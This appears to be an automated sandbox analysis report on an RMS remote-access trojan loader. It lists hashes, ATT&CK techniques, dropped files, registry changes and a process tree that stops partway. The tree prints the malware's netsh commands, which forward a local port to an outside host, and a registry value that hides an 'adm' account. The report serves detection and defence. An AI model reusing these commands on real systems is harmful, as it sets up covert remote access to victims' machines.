rms | 3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

Target

tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Size

397KB
MD5

aff57ee1a4f3731c2036046910f78fb4
SHA1

ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256

3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512

5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Score

10^/10

rms discovery evasion persistence rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Blocklisted process makes network request 1 IoCs

flow	pid	Process
35	2616	msiexec.exe

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
2260	RMS.exe
1940	installer.exe
308	rutserv.exe
3168	rutserv.exe
1064	rutserv.exe
1124	rutserv.exe
2176	rfusclient.exe
2520	rfusclient.exe
2168	rfusclient.exe

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
2144	MsiExec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Program Files directory 53 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\progress.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui2.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmspm.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\install.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\stdnames_vpd.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\install.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\ntprint.inf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\English.lg	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.ini	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\srvinst_x64.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\fwproc.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms_s.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui2.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmspm.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.ini	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\progress.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\ntprint.inf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\SampleClient.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\VPDAgent_x64.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\uninstall.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\uninstall.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\srvinst.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\fwproc.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms_s.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\VPDAgent.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\stdnames_vpd.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.hlp	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.hlp	msiexec.exe

Drops file in Windows directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
File opened for modification	C:\Windows\Installer\MSI382E.tmp	msiexec.exe
File created	C:\Windows\Installer\f77361e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe	msiexec.exe
File created	C:\Windows\SoftwareDistribution\config.xml	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
File created	C:\Windows\Installer\SourceHash{D9E14363-FD66-419D-9DC9-C62471755C9F}	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\f77361b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3A90.tmp	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe	msiexec.exe
File created	C:\Windows\Installer\f77361b.msi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1252	NETSTAT.EXE
3860	NETSTAT.EXE
980	NETSTAT.EXE

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rutserv.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rutserv.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\PackageName = "rms.host6.3ru_mod.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\1 = "DISK1;1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductIcon = "C:\\Windows\\Installer\\{D9E14363-FD66-419D-9DC9-C62471755C9F}\\ARPPRODUCTICON.exe"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\PackageCode = "EE22CCA5812A64F4CB23B29D2A4A798E"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Language = "1049"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Version = "115998720"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductName = "Remote Manipulator System - Host"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9\RMS	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
1940	installer.exe
1940	installer.exe
1940	installer.exe
1940	installer.exe
1940	installer.exe
1940	installer.exe
1940	installer.exe
1940	installer.exe
1940	installer.exe
1940	installer.exe
2616	msiexec.exe
2616	msiexec.exe
308	rutserv.exe
308	rutserv.exe
308	rutserv.exe
308	rutserv.exe
308	rutserv.exe
308	rutserv.exe
3168	rutserv.exe
3168	rutserv.exe
1064	rutserv.exe
1064	rutserv.exe
1124	rutserv.exe
1124	rutserv.exe
1124	rutserv.exe
1124	rutserv.exe
1124	rutserv.exe
1124	rutserv.exe
2520	rfusclient.exe
2520	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2168	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Token: SeSecurityPrivilege	440	msiexec.exe
Token: SeDebugPrivilege	1252	NETSTAT.EXE
Token: SeDebugPrivilege	3860	NETSTAT.EXE
Token: SeDebugPrivilege	980	NETSTAT.EXE
Token: SeShutdownPrivilege	1320	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1320	msiexec.exe
Token: SeSecurityPrivilege	2616	msiexec.exe
Token: SeCreateTokenPrivilege	1320	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1320	msiexec.exe
Token: SeLockMemoryPrivilege	1320	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1320	msiexec.exe
Token: SeMachineAccountPrivilege	1320	msiexec.exe
Token: SeTcbPrivilege	1320	msiexec.exe
Token: SeSecurityPrivilege	1320	msiexec.exe
Token: SeTakeOwnershipPrivilege	1320	msiexec.exe
Token: SeLoadDriverPrivilege	1320	msiexec.exe
Token: SeSystemProfilePrivilege	1320	msiexec.exe
Token: SeSystemtimePrivilege	1320	msiexec.exe
Token: SeProfSingleProcessPrivilege	1320	msiexec.exe
Token: SeIncBasePriorityPrivilege	1320	msiexec.exe
Token: SeCreatePagefilePrivilege	1320	msiexec.exe
Token: SeCreatePermanentPrivilege	1320	msiexec.exe
Token: SeBackupPrivilege	1320	msiexec.exe
Token: SeRestorePrivilege	1320	msiexec.exe
Token: SeShutdownPrivilege	1320	msiexec.exe
Token: SeDebugPrivilege	1320	msiexec.exe
Token: SeAuditPrivilege	1320	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1320	msiexec.exe
Token: SeChangeNotifyPrivilege	1320	msiexec.exe
Token: SeRemoteShutdownPrivilege	1320	msiexec.exe
Token: SeUndockPrivilege	1320	msiexec.exe
Token: SeSyncAgentPrivilege	1320	msiexec.exe
Token: SeEnableDelegationPrivilege	1320	msiexec.exe
Token: SeManageVolumePrivilege	1320	msiexec.exe
Token: SeImpersonatePrivilege	1320	msiexec.exe
Token: SeCreateGlobalPrivilege	1320	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe
Token: SeTakeOwnershipPrivilege	2616	msiexec.exe
Token: SeRestorePrivilege	2616	msiexec.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1940	installer.exe
308	rutserv.exe
3168	rutserv.exe
1064	rutserv.exe
1124	rutserv.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 3160 wrote to memory of 2280	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	69
PID 3160 wrote to memory of 2280	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	69
PID 2280 wrote to memory of 964	2280	csc.exe	71
PID 2280 wrote to memory of 964	2280	csc.exe	71
PID 3160 wrote to memory of 996	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	73
PID 3160 wrote to memory of 996	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	73
PID 3160 wrote to memory of 3168	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	77
PID 3160 wrote to memory of 3168	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	77
PID 3160 wrote to memory of 1252	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	78
PID 3160 wrote to memory of 1252	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	78
PID 3160 wrote to memory of 3860	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	79
PID 3160 wrote to memory of 3860	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	79
PID 3160 wrote to memory of 980	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	80
PID 3160 wrote to memory of 980	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	80
PID 3160 wrote to memory of 1048	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	81
PID 3160 wrote to memory of 1048	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	81
PID 3160 wrote to memory of 2440	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	82
PID 3160 wrote to memory of 2440	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	82
PID 3160 wrote to memory of 3720	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	83
PID 3160 wrote to memory of 3720	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	83
PID 3160 wrote to memory of 3116	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	84
PID 3160 wrote to memory of 3116	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	84
PID 3160 wrote to memory of 68	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	85
PID 3160 wrote to memory of 68	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	85
PID 3160 wrote to memory of 2260	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	88
PID 3160 wrote to memory of 2260	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	88
PID 3160 wrote to memory of 2260	3160	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	88
PID 2260 wrote to memory of 1940	2260	RMS.exe	89
PID 2260 wrote to memory of 1940	2260	RMS.exe	89
PID 2260 wrote to memory of 1940	2260	RMS.exe	89
PID 1940 wrote to memory of 1320	1940	installer.exe	90
PID 1940 wrote to memory of 1320	1940	installer.exe	90
PID 1940 wrote to memory of 1320	1940	installer.exe	90
PID 2616 wrote to memory of 2144	2616	msiexec.exe	92
PID 2616 wrote to memory of 2144	2616	msiexec.exe	92
PID 2616 wrote to memory of 2144	2616	msiexec.exe	92
PID 2616 wrote to memory of 308	2616	msiexec.exe	93
PID 2616 wrote to memory of 308	2616	msiexec.exe	93
PID 2616 wrote to memory of 308	2616	msiexec.exe	93
PID 2616 wrote to memory of 3168	2616	msiexec.exe	94
PID 2616 wrote to memory of 3168	2616	msiexec.exe	94
PID 2616 wrote to memory of 3168	2616	msiexec.exe	94
PID 2616 wrote to memory of 1064	2616	msiexec.exe	95
PID 2616 wrote to memory of 1064	2616	msiexec.exe	95
PID 2616 wrote to memory of 1064	2616	msiexec.exe	95
PID 1940 wrote to memory of 1360	1940	installer.exe	97
PID 1940 wrote to memory of 1360	1940	installer.exe	97
PID 1940 wrote to memory of 1360	1940	installer.exe	97
PID 1124 wrote to memory of 2176	1124	rutserv.exe	99
PID 1124 wrote to memory of 2176	1124	rutserv.exe	99
PID 1124 wrote to memory of 2176	1124	rutserv.exe	99
PID 1124 wrote to memory of 2520	1124	rutserv.exe	100
PID 1124 wrote to memory of 2520	1124	rutserv.exe	100
PID 1124 wrote to memory of 2520	1124	rutserv.exe	100
PID 2520 wrote to memory of 2168	2520	rfusclient.exe	104
PID 2520 wrote to memory of 2168	2520	rfusclient.exe	104
PID 2520 wrote to memory of 2168	2520	rfusclient.exe	104

C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"
1⤵
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3160
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cxum69oc.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2280
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES440B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC440A.tmp"
    3⤵
    PID:964
- C:\Windows\system32\chcp.com
  "C:\Windows\system32\chcp.com" 437
  2⤵
  PID:996
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:3168
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:3860
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy reset
  2⤵
  PID:1048
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:2440
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
  2⤵
  PID:3720
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:3116
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:68
- C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe
  "C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2260
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1940
  - - C:\Windows\SysWOW64\msiexec.exe
